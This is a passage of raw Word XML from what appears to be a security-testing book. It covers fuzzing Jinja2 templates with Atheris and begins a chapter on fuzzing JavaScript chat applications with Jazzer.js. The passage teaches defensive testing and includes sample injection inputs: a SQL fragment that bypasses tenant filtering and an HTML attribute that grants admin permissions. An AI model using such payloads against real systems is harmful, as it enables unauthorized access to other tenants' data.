    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attribute injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- user data adding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">data-role="admin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or permission attributes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Structure modification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- content that changes HTML element hierarchy</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Logic corruption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- input that triggers unintended template conditional branches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Property injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- data that adds access control properties to objects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example corruption scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intended output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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user-card"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data-role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"{{user.role}}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{user.name}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corrupted output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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user-card"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data-role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data-permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{user.name}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This class of vulnerability affects any application where template output influences authorization, access control, or application functionality. Content management systems, user interfaces, and email generators all process user data through templates that can be structurally corrupted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key insight:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Template fuzzing reveals semantic corruption that changes application meaning, not just visual appearance. Systematic input generation discovers data combinations that break intended output structure.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="111"/>
    <w:bookmarkStart w:id="112" w:name="Xb3019e858c488be1d8ab38ea58a9a3a8fcc9c2e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Workflow 3: Jinja2 SQL Template Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jinja2 SQL template injection vulnerabilities emerge when Atheris systematically corrupts template variables flowing into SQL query construction, discovering input combinations that bypass tenant filtering and access unauthorized data. Applications use Jinja2 for SQL construction because it enables dynamic queries with conditional logic, complex filtering, and maintainable query organization that raw string concatenation cannot provide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL templates process user input through multiple layers: template variable substitution, conditional logic evaluation, and SQL syntax construction. This processing pipeline creates injection opportunities when template variables contain SQL syntax, when conditional logic gets manipulated, or when template filters fail to properly escape SQL-specific characters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create your Jinja2 SQL template fuzzing harness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzz_sql_workflow.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the SQL template fuzzer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fuzz_sql_workflow.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within 20-25 minutes, you’ll discover Jinja2 SQL template injection vulnerabilities. Watch for template variables that inject SQL logic bypassing tenant filters, input that accesses unauthorized records, and queries that leak data across tenant boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jinja2 SQL template injection occurs through:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Variable injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- template variables containing SQL syntax that corrupts query structure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Conditional bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- input that manipulates Jinja2 conditional logic in WHERE clauses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Filter corruption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- data that breaks intended Jinja2 filters applied to SQL parameters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Template logic abuse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- exploiting Jinja2 loops and conditionals to modify query semantics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example injection scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intended Jinja2 SQL templat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releases</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tenant_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{{tenant_id}}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> search_term %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'%{{search_term}}%'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{% endif %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> created_date </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corrupted template bypassing tenant isolation:</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releases</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tenant_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{{tenant_id}}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> search_term %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tenant_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{{tenant_id}}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--%'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{% endif %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> created_date </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These vulnerabilities represent critical security and reliability failures in SaaS applications, multi-tenant platforms, and any system implementing row-level security through Jinja2 SQL templates. Tenant isolation bugs can cause data leaks, compliance violations, and service reliability issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key insight:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Jinja2 SQL template fuzzing reveals injection patterns that bypass business logic constraints while appearing to use safe template practices. Systematic input generation discovers template variable combinations that corrupt intended query structure and access unauthorized records.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="112"/>
    <w:bookmarkStart w:id="113" w:name="X72e54ab034163b3b23c6e561bfc5be924c4c9a8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding Production-Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve discovered three classes of sophisticated Jinja2 vulnerabilities using systematic fuzzing: expression injection causing code execution, template structure corruption changing application semantics, and SQL template injection enabling unauthorized data access. Each vulnerability class represents real production risks that manual testing rarely discovers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These techniques transfer directly to any Python application using Jinja2 for dynamic content. Configuration systems contain expression injection surfaces, web applications render user data through templates, and database applications construct queries using template engines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2 expression fuzzing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">applies to build systems, configuration processors, deployment scripts, and dynamic content generation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Template structure fuzzing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">applies to content management, user interfaces, email generation, and document processing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL template fuzzing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">applies to SaaS platforms, reporting systems, and database applications with dynamic query construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start implementing systematic Jinja2 fuzzing for your most critical template processing workflows. Begin with configuration templating, HTML rendering, and SQL construction—​these represent the highest vulnerability density because they process external input through complex template logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic approach scales across application domains while revealing Jinja2 vulnerability classes that traditional testing approaches miss. Within a week, you’ll have reliability testing that prevents sophisticated template injection crashes from reaching production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 7 extends these systematic testing approaches to JavaScript and Node.js applications, where prototype pollution, event loop blocking, and dependency resolution create different vulnerability surfaces requiring specialized fuzzing techniques designed for server-side JavaScript environments.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">== Chapter 7: JavaScript Service Reliability with Jazzer.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Applying libFuzzer techniques from Chapter 2 to discover bugs in your chat application code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your libFuzzer expertise from Chapter 2 transfers directly to chat applications, but here’s the twist: you’re hunting bugs in code you wrote, not stress-testing JavaScript engines. When users type messages into your chat interface, those characters flow through authentication logic you implemented, message validation you designed, and rendering code you built. Each layer contains potential vulnerabilities waiting for systematic discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Your Chat Application Security Priority Matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before diving into fuzzing techniques, here’s your vulnerability assessment framework based on chat application features you control:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Vulnerabilities (Fix immediately - 4 hours)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Your user authentication and room access control logic presents the highest security risk. Permission checking functions, user ID validation, and administrative privilege escalation represent attack vectors that compromise your entire chat system when exploited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">High Impact Vulnerabilities (Address this week - 8 hours)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Message processing and content rendering create user-facing attack surfaces. Cross-site scripting vulnerabilities in message display, injection flaws in search functionality, and protocol abuse in WebSocket event handling affect every user interaction with your chat platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Medium Priority Vulnerabilities (Monthly focus - 16 hours)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Template processing, external content handling, and input validation systems represent significant attack vectors when processing user-controlled data through server-side components that enable code execution or network access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This prioritization focuses exclusively on vulnerabilities in chat application code you wrote and control. You’re not testing whether the JavaScript engine handles pathological JSON parsing—​that’s V8’s responsibility. You’re discovering authentication bypasses in your permission logic, injection flaws in your message processing, and code execution vulnerabilities in your template handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Reality Check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Most developers discover their first chat application vulnerability within thirty minutes of systematic testing. Plan four hours for initial harness development, eight hours for continuous integration setup, and two hours monthly for maintenance as your chat features evolve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jazzer.js brings systematic vulnerability discovery to your chat application logic using the same coverage-guided exploration you mastered in Chapter 2. Write harnesses targeting your authentication functions, message processing pipelines, and template handling code while Jazzer.js systematically explores input combinations that trigger security failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Picture your real-time chat system: Express.js routes handling user registration and login, middleware validating room access permissions, WebSocket handlers processing message broadcasts, template engines formatting notification emails. You implemented validation functions, designed authorization schemes, built message rendering logic, and created template processing systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates expected user behavior. Users register with valid email addresses, send appropriate messages, join authorized chat rooms, receive properly formatted notifications. Manual testing rarely explores the boundaries where your application logic fails: malformed authentication tokens, malicious message content, template injection payloads, or crafted requests that expose vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What happens when user registration receives JSON payloads designed to corrupt object prototypes throughout your application? When message content contains script tags targeting your rendering logic? When notification templates include code execution payloads? When external content requests target internal network resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
